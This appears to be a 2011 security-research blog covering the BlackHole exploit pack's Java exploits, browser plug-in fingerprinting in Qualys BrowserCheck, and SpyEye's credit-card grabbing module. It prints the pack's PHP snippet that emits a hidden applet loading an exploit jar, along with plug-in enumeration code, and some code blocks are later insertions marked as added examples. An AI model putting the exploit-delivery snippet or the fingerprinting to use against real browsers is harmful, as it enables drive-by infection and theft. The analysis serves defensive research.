Monday, February 21, 2011

Java OBE + BlackHole - Dead Man Rising



The BlackHole exploit pack is showing a heavy increase in malware infections across the web. The interesting fact about BlackHole is its use of Java OBE (Open Business Engine) in spreading exploits and successfully loading the malicious executable on the victim machine.

What is OBE?
"OBE is a flexible, modular, standards-compliant Open Source Java workflow engine. It is fully J2EE compliant, and supports several J2EE application servers, operating systems and databases. It faithfully implements Workflow Management Coalition Open Standards (WfMC), to which it offers a variety of extensions and enhancements. OBE is equally suited to embedded or standalone deployment."

More details can be found here

However, BlackHole is using a fully functional Java OBE toolkit in order to exploit a plethora of systems. Our latest analysis shows that Java OBE holds the maximum rate of successfully exploiting targets. The BlackHole exploit pack shows this behavior, where the Java OBE toolkit is compromising victim machines at a more rapid pace than any other exploit.

The exploits served by Java OBE are CVE-2010-0840 and CVE-2010-0842.

As stated by the Zero Day Initiative: "Authentication is not required to exploit this vulnerability. The specific flaw exists within the code responsible for ensuring proper privileged execution of methods. If an untrusted method in an applet attempts to call a method that requires privileges, Java will walk the call stack and for each entry verify that the method called is defined within a class that has that privilege."

The BlackHole exploit pack uses the following PHP code to link to the exploit (the angle brackets of the emitted HTML tags are restored here; they were stripped on extraction)

<?php
include_once 'config.php';
echo '<applet Code="ToolsDemo.class" archive="';
echo $config_url . '/exploits/Java-2010-0842.jar';
echo '" width="0" Height="1">
<PARAM NAME="URL" VALUETYPE="ref" VALUE="';
echo $config_url . '/exploits/Java-2010-0842Helper.php';
echo '">
</applet>';
?>
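As an added defender-side example (not code from the exploit pack or from the original post), the following JavaScript scans an HTML document for applet tags shaped like the one the PHP above emits: a remote .jar archive, a near-invisible 0x1 applet box, and a PARAM that hands the applet a second-stage URL. SAMPLE_HTML is a constructed input; the host example.invalid is a placeholder.

```javascript
// Constructed sample: one applet mirroring the PHP output above, one benign applet.
const SAMPLE_HTML = [
  '<html><body><p>hello</p>',
  '<applet Code="ToolsDemo.class" archive="http://example.invalid/exploits/Java-2010-0842.jar"',
  ' width="0" Height="1"><PARAM NAME="URL" VALUETYPE="ref"',
  ' VALUE="http://example.invalid/exploits/Java-2010-0842Helper.php"></applet>',
  '<applet code="Chart.class" archive="chart.jar" width="400" height="300"></applet>',
  '</body></html>',
].join('\n');

// Parse name="value" / name='value' / name=value pairs; attribute names are case-insensitive.
function parseAttrs(tagBody) {
  const attrs = {};
  const re = /([A-Za-z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tagBody)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4] ?? '';
  }
  return attrs;
}

// Returns the applets that match at least two of the three loader heuristics.
function findSuspiciousApplets(html) {
  const findings = [];
  const appletRe = /<applet\b([^>]*)>([\s\S]*?)<\/applet>/gi;
  let m;
  while ((m = appletRe.exec(html)) !== null) {
    const a = parseAttrs(m[1]);
    const params = [];
    const paramRe = /<param\b([^>]*)>/gi;
    let p;
    while ((p = paramRe.exec(m[2])) !== null) params.push(parseAttrs(p[1]));
    const reasons = [];
    const w = parseInt(a.width ?? '', 10), h = parseInt(a.height ?? '', 10);
    if (!Number.isNaN(w) && !Number.isNaN(h) && w <= 1 && h <= 1) reasons.push('hidden 0x1 applet');
    if (/^https?:\/\//i.test(a.archive ?? '')) reasons.push('remote jar archive');
    if (params.some(q => /^https?:\/\//i.test(q.value ?? ''))) reasons.push('URL param handed to applet');
    if (reasons.length >= 2) findings.push({ code: a.code, archive: a.archive, reasons });
  }
  return findings;
}
```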


The exploit is encoded with the PHP ionCube encoder; the loader stub at the top of the file reads as follows

<?php //0035e
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));
$__ln='/ioncube/ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');
$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);
if(strlen($__id)>1&&$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}
$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);
while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}
@dl($__ln);}else{die('The file '.__FILE__." is corrupted.\n");}
if(function_exists('_il_exec')){return _il_exec();}
echo('Site error: the file '.__FILE__.' requires the ionCube PHP Loader '.basename($__ln).' to be installed by the site administrator.');exit(199);
?>
This exploit can be found in the wild on the World Wide Web. During our analysis, exploit-specific statistics were collected from an infected domain hosting the BlackHole exploit pack. The comparative ratio is presented below



This scenario shows the ease of exploiting the Java open engine. Only the BlackHole exploit pack is analyzed here, so what about other exploit packs? It seems that Java is becoming the preferred base for exploitation because of its platform-independent nature.

Saturday, February 19, 2011

BrowserCheck - Malware Driven Retrospective



Recently, we came across a new browser security tool released by Qualys, termed BrowserCheck. In general, this tool scrutinizes and verifies the state of plug-ins in the Mozilla browser. As stated in the InformationWeek article: "Less-than-current browser and plug-in versions can leave your browsing unnecessarily vulnerable to web-based attacks... and make latest-and-greatest-based web sites harder or impossible to use, but Qualys' free BrowserCheck can help."

Well, in general the tool is designed as a simple version-based signature tool. However, it uses a PHP-based version verifier script that runs on the server side. An XMLHttpRequest is used to send the browser-based information, a technique we term User Agent Based Fingerprinting (UABF).

This same technique is used in the wild by all classes of malware to detect the state of browsers (version, add-ons, plug-ins, etc.). Apart from this, malware is served based on the version that is running. A similar plug-in detection script can be compiled using the navigator object as follows
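The two client-side checks the post describes, as an added example that is not code from the original post or from BrowserCheck: a user-agent parse (the UABF step) and a navigator.plugins inventory. Both take an injected `nav` object so they can run outside a browser; FAKE_NAVIGATOR is a constructed stand-in, and the version-in-description heuristic is an assumption about how plug-ins label themselves.

```javascript
// Pull browser and OS facts out of the user-agent string (the UABF step).
function parseUserAgent(ua) {
  const ff = /Firefox\/(\d+(?:\.\d+)+)/.exec(ua);
  const nt = /Windows NT (\d+\.\d+)/.exec(ua);
  return {
    browser: ff ? 'Mozilla Firefox' : null,
    browserVersion: ff ? ff[1] : null,
    windowsNt: nt ? nt[1] : null,
    wow64: /WOW64/.test(ua),            // 32-bit browser on 64-bit Windows
  };
}

// Inventory navigator.plugins; in a browser pass globalThis.navigator.
function enumeratePlugins(nav) {
  const plugins = nav.plugins ? Array.from(nav.plugins) : [];
  return plugins.map(p => {
    // Plug-ins usually carry their version in the description, e.g. "... 1.6.0_22 for ..."
    const v = /(\d+(?:[._]\d+)+)/.exec(p.description || '');
    return {
      name: p.name,
      filename: p.filename,
      version: v ? v[1] : null,
      mimeTypes: Array.from(p).map(mt => mt.type),   // Plugin is array-like over MimeType
    };
  });
}

// Java is detected through its applet MIME type rather than by plug-in name.
function hasJavaPlugin(nav) {
  const mts = nav.mimeTypes ? Array.from(nav.mimeTypes) : [];
  return mts.some(mt => /^application\/x-java-applet/i.test(mt.type));
}

// Constructed navigator stand-in mirroring Firefox 3.6-era plug-in metadata.
const FLASH_MT = { type: 'application/x-shockwave-flash' };
const JAVA_MT = { type: 'application/x-java-applet;version=1.6' };
const FAKE_NAVIGATOR = {
  userAgent: 'Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13',
  plugins: [
    Object.assign([FLASH_MT], { name: 'Shockwave Flash', filename: 'NPSWF32.dll',
      description: 'Shockwave Flash 10.2 r152' }),
    Object.assign([JAVA_MT], { name: 'Java(TM) Platform SE 6 U22', filename: 'npjp2.dll',
      description: 'Next Generation Java Plug-in 1.6.0_22 for Mozilla browsers' }),
  ],
  mimeTypes: [FLASH_MT, JAVA_MT],
};
```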



Further, it is also observed that the tool uses JavaScript and XMLHttpRequest together to collect information from the client machine. During testing, we ran a small check of whether a Java applet is loaded on the system, in order to verify the semantics of the tool. Generally, the Java plug-in version can be checked with a simple Java applet as follows

import java.applet.*;
import java.awt.*;

public class JavaVersionDisplayApplet extends Applet {
    private Label m_labVersionVendor;

    public JavaVersionDisplayApplet() { // constructor
        m_labVersionVendor = new Label(" Java Version: " +
                System.getProperty("java.version") +
                " from " + System.getProperty("java.vendor"));
        this.add(m_labVersionVendor);
    }
}


The Java client-side environment was not triggered on the test machine, which clearly indicates that the fingerprinting is done using simple tactics. While running the tool on one of our test-bed machines, we found that the data is transferred as

{"ScanInfo":
  {"Platform":"Microsoft Windows Vista Home Premium Edition, 64-bit Service Pack 2",
   "Browser":"Mozilla Firefox 3.6.13","AgentVer":"1.1.95.1","SADllVer":"1.1.95.1",
   "InstanceId":"72904d0d-a58e-409d-afa3-922d1c8a71cd","ScanId":"5"},

 "ScanResults":[
  {"Status":"Up To Date","ItemType":"Browser","ItemName":"Mozilla Firefox",
   "FoundVer":"3.6.13","ProductVer":"3.6.13","RequiredVer":"3.6.13.0",
   "FixInfo":"http://www.mozilla.com/en-US/firefox/upgrade.html"},

  {"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Flash Player",
   "FoundVer":"10.2.152.26","InstalledFile":"c:\\windows\\syswow64\\macromed\\flash\\npswf32.dll",
   "ProductVer":"10.2.152.26","RequiredVer":"10.2.152.26",
   "AdvisoryUrl":"http://www.adobe.com/support/security/advisories/apsa10-05.html",
   "AddonType":"Plugin","FixInfo":"http://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe"},

  {"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Adobe Reader",
   "FoundVer":"10.0.1.434","InstalledFile":"c:\\program files (x86)\\adobe\\reader 10.0\\reader\\browser\\nppdf32.dll",
   "ProductVer":"10.0.1.434","RequiredVer":"10.0.1.434",
   "AddonType":"Plugin","FixInfo":"http://get.adobe.com/reader"},

  {"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Java Runtime",
   "FoundVer":"1.6.0_22","ProductVer":"1.6.0_22","RequiredVer":"1.6.0_24",
   "RecommendedVer":"Latest Version of Java","AddonType":"Plugin",
   "FixInfo":"http://www.java.com/getjava/index.jsp"},

  {"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Silverlight",
   "FoundVer":"4.0.60129.0","InstalledFile":"c:\\program files (x86)\\microsoft silverlight\\4.0.60129.0\\npctrl.dll",
   "ProductVer":"4.0.60129.0","RequiredVer":"4.0.60129.0",
   "AddonType":"Plugin","FixInfo":"http://www.microsoft.com/getsilverlight/handlers/getsilverlight.ashx"},

  {"Status":"NA","ItemType":"Browser Extra","ItemName":"Microsoft Windows Presentation Foundation",
   "FoundVer":"3.5.30729.1","InstalledFile":"",
   "ProductVer":"3.5.30729.1","RequiredVer":"3.5.30729.1",
   "AddonType":"Plugin","FixInfo":"http://www.microsoft.com/downloads/"},

  {"Status":"Up To Date","ItemType":"Browser Extra","ItemName":"Microsoft Windows Media Player",
   "FoundVer":"11.0.6002.18311","InstalledFile":"C:\\Windows\\system32\\wmp.dll",
   "ProductVer":"11.0.6002.18311","RequiredVer":"11.0.6002.18311","AddonType":"Plugin",
   "FixInfo":"http://www.microsoft.com/downloads/en/confirmation.aspx?familyid=277151A2-B74F-4DA6-8203-E774AF75E44C&displaylang=en"}]}
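As an added example (not BrowserCheck's own code), the following JavaScript re-checks the ScanResults format above by comparing FoundVer with RequiredVer itself instead of trusting the Status field. On the data above the two disagree for Java Runtime (1.6.0_22 found, 1.6.0_24 required, Status still "Up To Date"), which is the kind of check a reviewer of a signature-based tool wants. SCAN is a constructed subset of that output; the version grammar (digits separated by "." or "_", missing trailing parts read as 0) is an assumption.

```javascript
// Constructed subset of the scan output above.
const SCAN = {
  ScanResults: [
    { Status: 'Up To Date', ItemName: 'Mozilla Firefox', FoundVer: '3.6.13', RequiredVer: '3.6.13.0' },
    { Status: 'Up To Date', ItemName: 'Adobe Flash Player', FoundVer: '10.2.152.26', RequiredVer: '10.2.152.26' },
    { Status: 'Up To Date', ItemName: 'Java Runtime', FoundVer: '1.6.0_22', RequiredVer: '1.6.0_24' },
    { Status: 'NA', ItemName: 'Microsoft Windows Presentation Foundation', FoundVer: '3.5.30729.1', RequiredVer: '3.5.30729.1' },
  ],
};

// Split "1.6.0_22" or "3.6.13.0" into numeric parts; "." and "_" both separate components.
function versionParts(v) {
  return String(v).split(/[._]/).map(s => parseInt(s, 10)).filter(n => !Number.isNaN(n));
}

// strcmp-style result (<0, 0, >0). Missing trailing parts count as 0, so 3.6.13 == 3.6.13.0.
function compareVersions(a, b) {
  const pa = versionParts(a), pb = versionParts(b);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const d = (pa[i] ?? 0) - (pb[i] ?? 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Items whose installed version is below the required one, noting whether the tool's
// own Status field agrees with that verdict.
function auditScan(scan) {
  return scan.ScanResults
    .filter(r => compareVersions(r.FoundVer, r.RequiredVer) < 0)
    .map(r => ({
      item: r.ItemName,
      found: r.FoundVer,
      required: r.RequiredVer,
      statusAgrees: r.Status !== 'Up To Date',
    }));
}
```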


This scan info fully reflects the working of the tool. The technique is not new, but one can notice that signature-based tools are still widely used.

The next question is how this tool reacts when a malicious plug-in (carrying up-to-date version information) is installed in the browser.

Monday, February 14, 2011

HITB Paper - Shared Hosting Infections

HITB issue 5 talks about our paper on "Shared Hosting Malware Infections". FETCH here.

Sunday, February 6, 2011

SpyEye CreditGrab.dll Module - Plugin Analysis


In our last post about the SpyEye backend collector, we discussed the data transfer mechanism in the SpyEye botnet framework. SpyEye uses creditgrab.dll to take care of the credit card data stolen from victim machines. Last time we talked about the source code analysis; to support that, we recently came across the dynamic link libraries for the different modules. In this post, we are going to talk about creditgrab.dll.

The DLL main function is designed as follows


In the first part, the Credit Grab Module (CGM) is designed to get the bot information with a GUID reference. This bot GUID is used to keep track of the infection on the victim machine and the credit card information stolen from it. The code snippet presented below shows this





The function "TakeBotGuid" is used in conjunction with the CGM. In this function, the bot GUID is checked. The "repne scasb" instruction keeps scanning the string for the NULL terminator, decrementing the counter on each byte (dec ecx). If the carry flag is zero (jnb short loc_1000167D), the function jumps to the address that points to the bot GUID "unknown".

The gate collector function TakeGateToCollector is structured as follows

void TakeGateToCollector(LPVOID lpGateFunc);
typedef void (*GATETOCOLLECTOR)(IN PBYTE pbData, IN DWORD dwSize);




The next function that plays a critical role in hijacking the HTTP communication channel is Callback_OnBeforeLoadPage. The code snippet taken from this function is presented below



The function loads the bot GUID, URI and data by calling the same subroutine, "sub_10001370", which is a string checking and terminating routine that scrutinizes the parameters passed to the SpyEye function.



The snippet above shows the dissection of strings. The "strstr" and "strtok" functions are used together to find matching patterns and to split the string on the "&" token. In this function they serve URL dissection and collection of data from a raw source (i.e. information extraction from raw HTTP content). The XREF structure of the plugin module is traced below



So this post clearly shows the data collection mechanism of the SpyEye bot, by analyzing a specific DLL sample.

We will be covering the analysis of other modules (some new ones) in upcoming posts.